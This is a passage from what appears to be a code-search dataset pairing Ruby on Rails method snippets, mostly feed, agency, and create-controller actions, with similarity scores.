"def index\n @page_title = 'Feeds'\n if !@user.nil?\n @feeds = @user.feeds\n else\n @feeds = Feed.find(:all, :limit => 100)\n end\n render_index\n end",
"def feed_items\n feed_item\n end",
"def index\n @ads = @org.ads\n end",
"def feed\n @feeddata\n end",
"def index\n # Fetch all the categories the current user has preferred.\n @agencies = UsersAgency.preferrence_of current_user\n render template: 'api/v1/agencies/index', locals: { current_user: current_user }, status: :ok\n\n end",
"def feed!\n http_fetch(feed_url)\n end",
"def fetch\n feed_data = REXML::Document.new(open(@url, :proxy => true)).root\n parse(feed_data)\n end",
"def allergies\n raise UserNotAuthenticated unless access_token\n\n get('records/allergies')\n end",
"def index\n #body, ok = SuperfeedrEngine::Engine.retrieve(Feed.first) \n @entries = Entry.all\n end",
"def feed( params={} )\n feed = get_connections(\"feed\", params)\n return map_connections feed, :to => Facebook::Graph::Fee\n end",
"def fetch_news\n @news = News.fetch_and_store_news! @agencyfeed\n render template: 'news/list', status: :ok\n end",
"def all\n f = options[:format]\n a = options[:agency]\n ::Taxi::Status.list_all(format: f, agency: a)\n end",
"def feed( params={} )\n feed = get_connections(\"feed\", params)\n return map_connections feed, :to => Facebook::Graph::Generic\n end",
"def feed( params={} )\n feed = get_connections(\"feed\", params)\n return map_connections feed, :to => Facebook::Graph::Generic\n end",
"def index\n @allergies = Allergy.all\n end",
"def index\n @facebook_ads = FacebookAd.all\n end",
"def index\n # Load the latest full blog feed for Frank's blog as per \n @latest_blog_posts = load_blog_feed_for_url('http://blog.rietta.com/feeds/posts/default?alt=rss')\n \n # Load the latest posts for the Marketing label feed. Labels are case sensitive - Marketing != marketing\n # Please note that the example of the Google website has an error on its label example. The alt=rss comes after\n # the label in the feed URL\n @latest_marketing_posts = load_blog_feed_for_url('http://blog.rietta.com/feeds/posts/default/-/Marketing?alt=rss')\n \n # Load the latest posts for the SQL Converter label feed (space in the tag)\n @latest_sql_converter_posts = load_blog_feed_for_url('http://blog.rietta.com/feeds/posts/default/-/SQL%20Converter?alt=rss')\n end",
"def all_topics\n topics = Feed.find(params[:feed_id]).topics\n render :json => topics\n end",
"def feed_items\n []\n end",
"def fetch\n ##\n # an array of { category_id: number, news: array }\n @fetched = News.fetch_and_store_news_from_all_agency_feed!\n render :fetch, status: :ok\n end",
"def feed\n @blog_articles = BlogArticle.all\n respond_to do |format|\n format.rss { render layout: false }\n end\n end",
"def index\n id = params[:id].to_i\n\n if id != 0\n \t @agencies = @agencies.paginate(page: params[:page], per_page: 10).order(:name).find_all_by_id(id)\n if @agencies.any?\n @agency_name = @agencies.first.name\n end\n else\n \t @agencies = @agencies.paginate(page: params[:page], per_page: 10).order(:name).find(:all)\n end\n\n\t\t@records_returned = @agencies.count\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @agencies }\n end\n end",
"def feed\n feed_items =\n Photo\n .where(restaurant_id: params[:id])\n .includes(:owner, :tags, :fans)\n .order(created_at: :desc)\n .not_deleted\n .approved\n .paginate(page: params[:page], per_page: params[:per_page])\n\n expose feed_items, each_serializer: PhotoActivitySerializer\n end",
"def feed\n if current_user\n feed = []\n Event.where(user_id: current_user.id).each do |event|\n event.comments.each do |comment|\n if (DateTime.current - comment.created_at.to_datetime).to_f < (DateTime.current - current_user.last_sign_in.to_datetime).to_f\n feed << event.name << comment\n end\n end\n event.file_attachments.each do |file|\n if (DateTime.current - file.created_at.to_datetime).to_f < (DateTime.current - current_user.last_sign_in.to_datetime).to_f\n feed << event.name << file\n end\n end\n end\n respond_with feed\n else\n redirect_to root_path\n end\n end",
"def index\n if params[:id]\n @feed = Feed.find(params[:id])\n elsif params[:department_id]\n @department=Department.find(params[:department_id])\n @feeds = Feed.all.order({ updated_at: :desc })\n elsif params[:q]\n @feeds=Feed.search(params[:q])\n else\n @feeds = Feed.all.order({ updated_at: :desc })\n end\n end",
"def show\n @gtfs_agency = GtfsAgency.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @gtfs_agency }\n end\n end",
"def feeds\n profile = Profile.find(params[:id])\n profile.feeds\n redirect_to lato_profile_path(profile)\n end",
"def get_digg\n\nresponse = JSON.parse(RestClient.get 'http://digg.com/api/news/popular.json')\n# puts response['data']['feed'][0]['content']['title']\n\nstories = []\n\nresponse['data']['feed'].each do |story|\n\tstory_hash = {}\n\tstory_hash[:title] = story['content']['title']\n\tstory_hash[:category] = story['content']['tags'][0]['display']\n\tcalculate_upvotes(story_hash)\n\tstories.push(story_hash)\n\tend\n\tshow_all_stories(stories)\nend",
"def feed(name, options = {})\n if rel = feeds._links[name]\n get rel.href, :accept => rel.type, :options => options\n end\n end",
"def index\n @feeds = Feed.all.order(\"updated_at DESC\")\n end",
"def index\n @feeds = Feed.all\n @feed = Feed.new\n end",
"def show\n respond_to do |format|\n \tformat.html # show.html.erb\n \tformat.json { render json: @agency }\n end\n end",
"def index\n @advertisers = Advertiser.all\n end",
"def index\n @campaigns = Campaign.where(:live => true)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @campaigns }\n end\n end",
"def feeds\n\t\tuser = User.find_by_id(params[:user_id])\n\t\tunless user\n\t\t\trender json: {error: \"user not fonud\"} and return\n\t\tend\n\t\tcq = CompletedQuest.where(user_id: user.friends.ids).order(created_at: :desc).limit(10)\n\t\tfeeds = []\n\t\tcq.each do |q|\n\t\t\thash = {}\n\t\t\thash[:quest] = q.quest\n\t\t\tfriend = q.user\n\t\t\tfriend.password = nil\n\t\t\thash[:friend] = friend\n\t\t\thash[:time] = q.created_at\n\t\t\tfeeds.push(hash)\n\t\tend\n\t\trender json: {feeds: feeds}\n\tend",
"def get_all_ach_funding_sources_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: FundingSourcesApi.get_all_ach_funding_sources ...'\n end\n # resource path\n local_var_path = '/fundingsources/program/ach'\n\n # query parameters\n query_params = opts[:query_params] || {}\n query_params[:'count'] = opts[:'count'] if !opts[:'count'].nil?\n query_params[:'start_index'] = opts[:'start_index'] if !opts[:'start_index'].nil?\n query_params[:'fields'] = opts[:'fields'] if !opts[:'fields'].nil?\n query_params[:'sort_by'] = opts[:'sort_by'] if !opts[:'sort_by'].nil?\n\n # header parameters\n header_params = opts[:header_params] || {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n\n # form parameters\n form_params = opts[:form_params] || {}\n\n # http body (model)\n post_body = opts[:debug_body]\n\n # return_type\n return_type = opts[:debug_return_type] || 'ACHListResponse'\n\n # auth_names\n auth_names = opts[:debug_auth_names] || []\n\n new_options = opts.merge(\n :operation => :\"FundingSourcesApi.get_all_ach_funding_sources\",\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => return_type\n )\n\n data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options)\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: FundingSourcesApi#get_all_ach_funding_sources\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def index\n @lcb_feed_backs = LcbFeedBack.all\n end",
"def show\n\t\t@feeds = ExtensionFeed.paginate(page: params[:page],\n per_page: params[:per_page])\n\n\t\trespond_to do |format|\n\n\t\t\tformat.html { \n\t\t\t\trender locals: {\n\t\t\t\t\tfeeds: @feeds\n\t\t\t\t},\n\t\t\t\tlayout: false\n\t\t\t}\n\t\t\t\n\t\t\tformat.json # show.json.builder\n\t\tend\n\tend",
"def feed\n\n end",
"def news_feed\n begin\n client = Feedlr::Client.new(oauth_access_token: ENV['FEEDLY_OAUTH_ACCESS_TOKEN'])\n @latest_list = {}\n client.user_unread_counts.unreadcounts.each do |unread_articles|\n next if unread_articles['count'] == 0\n unread_article_items = client.stream_entries_contents(unread_articles.id, unreadOnly: true).items\n next if unread_article_items.empty?\n\n unread_article_items.each do |article|\n @latest_list[article.alternate[0].href] = \"◼︎ <a href='#{article.alternate[0].href}'>#{article.title} - #{article.origin.title}</a>\"\n end\n client.mark_article_as_read(unread_articles.id)\n end\n @latest_news = @latest_list.values.join(\"<br>\")\n rescue => evar\n fail evar\n end\n @latest_news\n end",
"def index\n @facebookads = Facebookad.all\n end",
"def salesApi\n require 'uri'\n require 'net/http'\n require 'json'\n\n #Arrays for each category\n \n @frequency = Hash.new(0)\n\n url = URI(\"https://api.salesloft.com/v2/people.json\")\n\n http = Net::HTTP.new(url.host, url.port)\n http.use_ssl = true\n\n request = Net::HTTP::Get.new(url)\n request[\"Authorization\"] = 'Bearer ' + ENV[\"API_KEY\"]\n\n response = http.request(request)\n \n @body = JSON.parse(response.body)['data']\n return @body\n end",
"def get_all_entries\n @feed_entries = FeedEntry.find(:all, :conditions => { :person_id => self.id}, :order => 'published_at DESC')\n end",
"def feed\n\t\t@goths = Goth.find(:all, :conditions => 'published_at IS NOT NULL', :limit => 10, :order => 'published_at DESC')\n\tend",
"def get_blog_feed\n # fetching a single feed\n @feed = []# Feedzirra::Feed.fetch_and_parse(\"http://norastable.wordpress.com/feed/\")\n end",
"def index\n @feeding_logs = FeedingLog.all\n end",
"def index\n @gadgets = Gadget.order(\"updated_at DESC\").limit(20)\n \n #initial right column data.\n get_one_gadget_by_one_category\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @gadgets }\n end\n end",
"def feed\n @data.feed ||= parsed_document.xpath(\"//link\").select{ |link|\n link.attributes[\"type\"] && link.attributes[\"type\"].value =~ /(atom|rss)/\n }.map { |link|\n absolutify_url(link.attributes[\"href\"].value)\n }.first rescue nil\n end",
"def all\n api_get(path)\n end",
"def feed\n end"
] | [
"0.65294206",
"0.64663476",
"0.6448661",
"0.6448661",
"0.6448661",
"0.6448661",
"0.6448661",
"0.63958734",
"0.63335794",
"0.62580824",
"0.62517816",
"0.62203056",
"0.6194411",
"0.6180867",
"0.6121181",
"0.6120239",
"0.61178607",
"0.6113262",
"0.610972",
"0.6106641",
"0.6102937",
"0.6075811",
"0.60726637",
"0.606673",
"0.60579914",
"0.6043135",
"0.60428756",
"0.60319215",
"0.6029084",
"0.6001137",
"0.5984129",
"0.5982739",
"0.59578496",
"0.59491444",
"0.5936012",
"0.5928839",
"0.59146625",
"0.5908672",
"0.5893742",
"0.58918744",
"0.58889663",
"0.5888582",
"0.58860755",
"0.58804154",
"0.5859071",
"0.5849843",
"0.5846881",
"0.5846699",
"0.58442414",
"0.581403",
"0.5804162",
"0.579913",
"0.5790942",
"0.57834077",
"0.57811344",
"0.57779706",
"0.5777541",
"0.5774268",
"0.57597476",
"0.5749095",
"0.5747034",
"0.572797",
"0.5726395",
"0.5726395",
"0.5717152",
"0.57130235",
"0.57021946",
"0.5694961",
"0.56879497",
"0.5687149",
"0.56785756",
"0.5667316",
"0.56626767",
"0.5662036",
"0.56609094",
"0.56568575",
"0.56556237",
"0.5641213",
"0.5633188",
"0.56321764",
"0.561713",
"0.5616888",
"0.5608373",
"0.55702",
"0.55669886",
"0.5562819",
"0.55572957",
"0.55571854",
"0.55507964",
"0.5543908",
"0.5543237",
"0.5542561",
"0.55421126",
"0.5537487",
"0.55350393",
"0.5532993",
"0.5526225",
"0.55247575",
"0.5519321",
"0.5518058"
] | 0.768968 | 0 |
POST /agencyfeed.json Create agency with params | def create
@agencyfeed = AgencyFeed.create! agencyfeed_params
render :show, status: :created
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def create\n @agency = Agency.new(agency_params)\n\n if @agency.save\n render json: @agency, status: :created, location: @agency\n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n\n if @agency.save\n render json: @agency, status: :created, location: @agency\n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n\n respond_to do |format|\n if @agency.save\n format.html { redirect_to @agency, notice: \"Agency was successfully created.\" }\n format.json { render :show, status: :created, location: @agency }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n respond_to do |format|\n if @agency.save\n format.html { redirect_to session[:redirect_to], notice: 'Agency was successfully created.' }\n #format.json { render action: 'show', status: :created, location: @agency }\n else\n format.html { render action: 'new' }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @news_agency = NewsAgency.new(params[:news_agency])\n\n respond_to do |format|\n if @news_agency.save\n format.html { redirect_to @news_agency, notice: 'News agency was successfully created.' }\n format.json { render json: @news_agency, status: :created, location: @news_agency }\n else\n format.html { render action: \"new\" }\n format.json { render json: @news_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @gtfs_agency = GtfsAgency.new(params[:gtfs_agency])\n\n respond_to do |format|\n if @gtfs_agency.save\n format.html { redirect_to(@gtfs_agency, :notice => 'Gtfs agency was successfully created.') }\n format.xml { render :xml => @gtfs_agency, :status => :created, :location => @gtfs_agency }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @gtfs_agency.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @admin_agency = Admin::Agency.new(params[:admin_agency])\n\n respond_to do |format|\n if @admin_agency.save\n format.html { redirect_to @admin_agency, notice: 'Agency was successfully created.' }\n format.json { render json: @admin_agency, status: :created, location: @admin_agency }\n else\n format.html { render action: \"new\" }\n format.json { render json: @admin_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if @agency.save\n format.html { redirect_to @agency, notice: 'Agency was successfully created.' }\n format.json { render json: @agency, status: :created, location: @agency }\n else\n format.html { render action: \"new\" }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency_type = AgencyType.new(params[:agency_type])\n\n respond_to do |format|\n if @agency_type.save\n format.html { redirect_to @agency_type, notice: 'Agency type was successfully created.' }\n format.json { render json: @agency_type, status: :created, location: @agency_type }\n else\n format.html { render action: \"new\" }\n format.json { render json: @agency_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency_relationship = AgencyRelationship.new(params[:agency_relationship])\n\n respond_to do |format|\n if @agency_relationship.save\n flash[:notice] = 'AgencyRelationship was successfully created.'\n format.html { redirect_to(\n agency_relationship_url(@agency_relationship)) }\n else\n format.html { render :action => \"new\" }\n end\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n if @agency.save\n @agency = Agency.new\n @agencies = Agency.all\n @flag = true\n else\n @flag = false\n end\n end",
"def agency_params\n params.require(:agency).permit(:title, :description)\n end",
"def create\n if params['cancel']\n redirect_to agencies_url and return\n end\n @agency = Agency.new(agencies_params)\n @agency.updated_by = current_user.login\n\n publication = Publication.new(publication_params)\n @agency.publications << publication unless publication.empty?\n\n #@agency.build_restriction\n #@agency.restriction.update_attributes(params[:restriction])\n #@agency.restriction.states=params[:state_abbrevs].collect{|s| State.find(s)} unless params[:state_abbrevs].to_s.blank?\n #@agency.restriction.counties=params[:county_ids].collect{|c| County.find(c)} unless params[:county_ids].nil?\n #@agency.restriction.cities=params[:city_ids].collect{|c| City.find(c)} unless params[:city_ids].nil?\n #@agency.restriction.zips=params[:zip_ids].collect{|c| Zip.find(c)} unless params[:zip_ids].nil?\n\n #composed_of fields must be created manually\n update_pha_contact\n\n if @agency.save\n flash[:notice] = 'Agency was successfully created.'\n redirect_to agencies_url() and return if params['update_and_return']\n redirect_to edit_agency_url(@agency)\n else\n render :action => \"new\"\n end\n end",
"def create\n @registering_agency = RegisteringAgency.new(registering_agency_params)\n\n respond_to do |format|\n if @registering_agency.save\n format.html { redirect_to @registering_agency, notice: 'Registering agency was successfully created.' }\n format.json { render action: 'show', status: :created, location: @registering_agency }\n else\n format.html { render action: 'new' }\n format.json { render json: @registering_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n\n @manager = Management.new\n @manager.user = current_user\n @manager.agency = @agency\n @manager.save\n\n respond_to do |format|\n if @agency.save\n AdminMailer.new_agency(@agency).deliver\n format.html { redirect_to @agency, notice: 'Agency was successfully created.' }\n format.json { render :show, status: :created, location: @agency }\n else\n format.html { render :new }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def agency_params\n params.require(:agency).permit(:title, :reg_number, :address, :phone, :status)\n end",
"def create\n fix_tokenized_input_params\n @ad = @org.ads.build(ad_params)\n\n respond_to do |format|\n if @ad.save\n format.html { redirect_to [@ad.org, @ad], notice: 'Ad was successfully created.' }\n format.json { render :show, status: :created, location: [@ad.org, @ad] }\n else\n format.html { render :new }\n format.json { render json: @ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @agency = Agency.new\n end",
"def agency_params\n params.require(:agency).permit( :name, :phone, :contact_name, :contact_email, :address, :latitude, :longitude, :website_url, :num_employees, :golden_pitch, :silver_pitch, :medium_risk_pitch, :high_risk_pitch, :agency )\n end",
"def agency_params\n params.require(:agency).permit(:code, :name, :description, :is_active)\n end",
"def agencies_create_test_agency(opts = {})\n data, _status_code, _headers = agencies_create_test_agency_with_http_info(opts)\n data\n end",
"def create\n @announcement = Announcement.new({title: params[:title], description: params[:description], price: params[:price], photo: params[:photo], user_id: params[:user_id], latitude: params[:latitude], longitude: params[:longitude], subcategory_id: params[:subcategory_id], place: params[:place]})\n @announcement.save\n render json:@announcement\n end",
"def agency_params\n params.require(:agency).permit(:name)\n end",
"def agencies_create_test_agency_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: AgenciesApi.agencies_create_test_agency ...'\n end\n # resource path\n local_var_path = '/v1/agencies/_testAgency'\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json', 'text/json', 'text/html', 'application/xml', 'text/xml'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['oauth2']\n data, status_code, headers = @api_client.call_api(:POST, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'DomainAgencyServiceV2ModelAgency')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: AgenciesApi#agencies_create_test_agency\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def create\n @tenancy_agreement = TenancyAgreement.new(params[:tenancy_agreement])\n @tenancy_agreement.estate_agent_id = current_user.estate_agent_id\n respond_to do |format|\n if @tenancy_agreement.save\n format.html { redirect_to tenancy_agreements_path, notice: 'Tenancy agreement was successfully created.' }\n format.json { render json: @tenancy_agreement, status: :created, location: @tenancy_agreement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @tenancy_agreement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @engagement_attendee = EngagementAttendee.new(engagement_params)\n if @engagement_attendee.save\n render :show, status: :created, location: api_v1_engagement_url(@engagement_attendee)\n else\n render json: @engagement_attendee.errors, status: :unprocessable_entity\n end\n end",
"def agency_params\n params.require(:agency).permit(:name, :description, :address, :user_id, :where, :photo, :photo_cache)\n end",
"def agency_params\n params.require(:agency).permit(:name, :city, :adress, :zipcode, :phone_number, :logo_agency_url, :siren)\n end",
"def agency_params\n params.require(:agency).permit(:name,\n :agycode,\n :photo,\n :description,\n :restrictions,\n :hours_of_operation,\n :address_id,\n :contact_name,\n :contact_phone,\n :contact_email,\n :services,\n :geographic_restrictions,\n :family_stipulations,\n :faith_based,\n :is_active,\n :general_information,\n { :service_ids => [] },\n address_attributes: [:id, :street_line_1, :street_line_2, :city, :state, :zip])\n end",
"def create\n @ally = Ally.new(ally_params)\n\n respond_to do |format|\n if @ally.save\n format.html { redirect_to @ally, notice: 'Ally was successfully created.' }\n format.json { render :show, status: :created, location: @ally }\n else\n format.html { render :new }\n format.json { render json: @ally.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advocacy = Advocacy.new(params[:advocacy])\n\n respond_to do |format|\n if @advocacy.save\n format.html { redirect_to @advocacy, notice: 'Advocacy was successfully created.' }\n format.json { render json: @advocacy, status: :created, location: @advocacy }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advocacy.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @age_tracker = AgeTracker.new(age_tracker_params)\n\n respond_to do |format|\n if @age_tracker.save\n format.html { redirect_to @age_tracker, notice: 'Age tracker was successfully created.' }\n format.json { render :show, status: :created, location: @age_tracker }\n else\n format.html { render :new }\n format.json { render json: @age_tracker.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @adj = Adj.new(adj_params)\n\n respond_to do |format|\n if @adj.save\n format.html { redirect_to @adj, notice: 'Adj was successfully created.' }\n format.json { render :show, status: :created, location: @adj }\n else\n format.html { render :new }\n format.json { render json: @adj.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @expense_tracker = ExpenseTracker.new(expense_tracker_params)\n\n respond_to do |format|\n if @expense_tracker.save\n format.html { redirect_to @expense_tracker, notice: 'Expense tracker was successfully created.' }\n format.json { render :show, status: :created, location: @expense_tracker }\n else\n format.html { render :new }\n format.json { render json: @expense_tracker.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #@adhub = Adhub.new(adhub_params)\n @adhub = current_user.adhubs.build(adhub_params)\n\n respond_to do |format|\n if @adhub.save\n format.html { redirect_to @adhub, notice: \"Advertisement was successfully created.\" }\n format.json { render :show, status: :created, location: @adhub }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @adhub.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agenda_type = AgendaType.new(params[:agenda_type])\n\n respond_to do |format|\n if @agenda_type.save\n format.html { redirect_to @agenda_type, :notice => 'Agenda type was successfully created.' }\n format.json { render :json => @agenda_type, :status => :created, :location => @agenda_type }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @agenda_type.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def registering_agency_params\n params.require(:registering_agency).permit(:name, :description)\n end",
"def create\n @advertisment = Advertisment.new(params[:advertisment])\n\n respond_to do |format|\n if @advertisment.save\n format.html { redirect_to @advertisment, notice: 'Advertisment was successfully created.' }\n format.json { render json: @advertisment, status: :created, location: @advertisment }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advertisment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @news_agency = NewsAgency.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @news_agency }\n end\n end",
"def create\n @audience = Audience.new(params[:audience])\n\n respond_to do |format|\n if @audience.save\n format.html { redirect_to @audience, notice: 'Audience was successfully created.' }\n format.json { render json: @audience, status: :created, location: @audience }\n else\n format.html { render action: \"new\" }\n format.json { render json: @audience.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @agency_type = AgencyType.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @agency_type }\n end\n end",
"def CreateOrganization params = {}\n \n APICall(path: 'organizations.json',method: 'POST',payload: params.to_json)\n \n end",
"def create\n @ally = Ally.new(ally_params)\n\n respond_to do |format|\n if @ally.save\n format.html { redirect_to edit_ally_path(@ally), notice: 'Ally was successfully created.' }\n format.json { render :show, status: :created, location: @ally }\n else\n format.html { render :new }\n format.json { render json: @ally.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advert = Advert.new(params[:advert])\n\n respond_to do |format|\n if @advert.save\n format.html { redirect_to @advert, notice: 'Advert was successfully created.' }\n format.json { render json: @advert, status: :created, location: @advert }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advert.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_deal(**args)\n params = parameters(args) do\n required_params :title\n optional_params :title, :value, :currency, :user_id, :person_id, :org_id, :stage_id, :status, :probability, :lost_reason, :add_time, :visible_to\n end\n request(:post, 'deals', params)\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @agency }\n end\n end",
"def create\n UsersAgency.selection_from_ids(current_user, params[:agency_selection])\n head :created\n end",
"def create\n passenger = Passenger.new(:name => params[:name], :contact_number => params[:contact_number], :nationality => params[:nationality], :meal_pref => params[:meal_pref])\n passenger.save\n render :json => passenger\n end",
"def create\n @engagement = Engagement.new(params[:engagement])\n\n respond_to do |format|\n if @engagement.save\n format.html { redirect_to @engagement, notice: 'Engagement was successfully created.' }\n format.json { render json: @engagement, status: :created, location: @engagement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @engagement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ad = Ad.new(ad_params)\n\n if @ad.save\n render :show, status: :created, location: @ad\n else\n render json: @ad.errors, status: :unprocessable_entity\n end\n end",
"def create\n @early_pregnancy = EarlyPregnancy.new(params[:early_pregnancy])\n\n respond_to do |format|\n if @early_pregnancy.save\n format.html { redirect_to @early_pregnancy, notice: 'Early pregnancy was successfully created.' }\n format.json { render json: @early_pregnancy, status: :created, location: @early_pregnancy }\n else\n format.html { render action: \"new\" }\n format.json { render json: @early_pregnancy.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advert = Advert.new(advert_params)\n\n respond_to do |format|\n if @advert.save\n format.html { redirect_to @advert, notice: 'Advert was successfully created.' }\n format.json { render :show, status: :created, location: @advert }\n else\n format.html { render :new }\n format.json { render json: @advert.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @home_indices_ad = Home::Indices::Ad.new(params[:home_indices_ad])\n\n respond_to do |format|\n if @home_indices_ad.save\n format.html { redirect_to @home_indices_ad, notice: 'Ad was successfully created.' }\n format.json { render json: @home_indices_ad, status: :created, location: @home_indices_ad }\n else\n format.html { render action: \"new\" }\n format.json { render json: @home_indices_ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @allergy = Allergy.new(params[:allergy])\n\n respond_to do |format|\n if @allergy.save\n format.html { redirect_to(@allergy, :notice => 'Allergy was successfully created.') }\n format.xml { render :xml => @allergy, :status => :created, :location => @allergy }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @allergy.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @engraving = Engraving.new(engraving_params)\n\n respond_to do |format|\n if @engraving.save\n format.html { redirect_to @engraving, notice: 'Engraving was successfully created.' }\n format.json { render :show, status: :created, location: @engraving }\n else\n format.html { render :new }\n format.json { render json: @engraving.errors, status: :unprocessable_entity }\n end\n end\n end",
"def postEntityAdvertiserCreate( entity_id, tags, locations, max_tags, max_locations, expiry_date, is_national, language, reseller_ref, reseller_agent_id, publisher_id)\n params = Hash.new\n params['entity_id'] = entity_id\n params['tags'] = tags\n params['locations'] = locations\n params['max_tags'] = max_tags\n params['max_locations'] = max_locations\n params['expiry_date'] = expiry_date\n params['is_national'] = is_national\n params['language'] = language\n params['reseller_ref'] = reseller_ref\n params['reseller_agent_id'] = reseller_agent_id\n params['publisher_id'] = publisher_id\n return doCurl(\"post\",\"/entity/advertiser/create\",params)\n end",
"def create\n @dataload_ga = DataloadGa.new(params[:dataload_ga])\n\n respond_to do |format|\n if @dataload_ga.save\n format.html { redirect_to edit_dataload_ga_path(@dataload_ga), notice: 'Dataload ga was successfully created.' }\n format.json { render json: @dataload_ga, status: :created, location: @dataload_ga }\n else\n format.html { render action: \"new\" }\n format.json { render json: @dataload_ga.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @org_award = OrgAward.new(org_award_params)\n\n respond_to do |format|\n if @org_award.save\n format.html { redirect_to @org_award, notice: 'Org award was successfully created.' }\n format.json { render :show, status: :created, location: @org_award }\n else\n format.html { render :new }\n format.json { render json: @org_award.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @gtfs_agency = GtfsAgency.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @gtfs_agency }\n end\n end",
"def create\n @advertisement_campaign = AdvertisementCampaign.new(advertisement_campaign_params)\n\n respond_to do |format|\n if @advertisement_campaign.save\n format.html { redirect_to @advertisement_campaign, notice: 'Advertisement campaign was successfully created.' }\n format.json { render action: 'show', status: :created, location: @advertisement_campaign }\n else\n format.html { render action: 'new' }\n format.json { render json: @advertisement_campaign.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ad = Ad.new(params[:ad])\n\n respond_to do |format|\n if @ad.save\n format.html { redirect_to @ad, notice: 'Ad was successfully created.' }\n format.json { render json: @ad, status: :created, location: @ad }\n else\n format.html { render action: \"new\" }\n format.json { render json: @ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n official = Official.new(official_params)\n if official.save\n render json: official, status: 201, location: [:api, official]\n else\n failed_to_create(official, \"official\")\n end\n end",
"def create\n @advertisement = Advertisement.new(params[:advertisement])\n\n respond_to do |format|\n if @advertisement.save\n format.html { redirect_to @advertisement, notice: 'Advertisement was successfully created.' }\n format.json { render json: @advertisement, status: :created, location: @advertisement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advertisement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @g_anewby = GAnewbie.new(g_anewby_params)\n\n respond_to do |format|\n if @g_anewby.save\n format.html { redirect_to @g_anewby, notice: 'G anewbie was successfully created.' }\n format.json { render action: 'show', status: :created, location: @g_anewby }\n else\n format.html { render action: 'new' }\n format.json { render json: @g_anewby.errors, status: :unprocessable_entity }\n end\n end\n end",
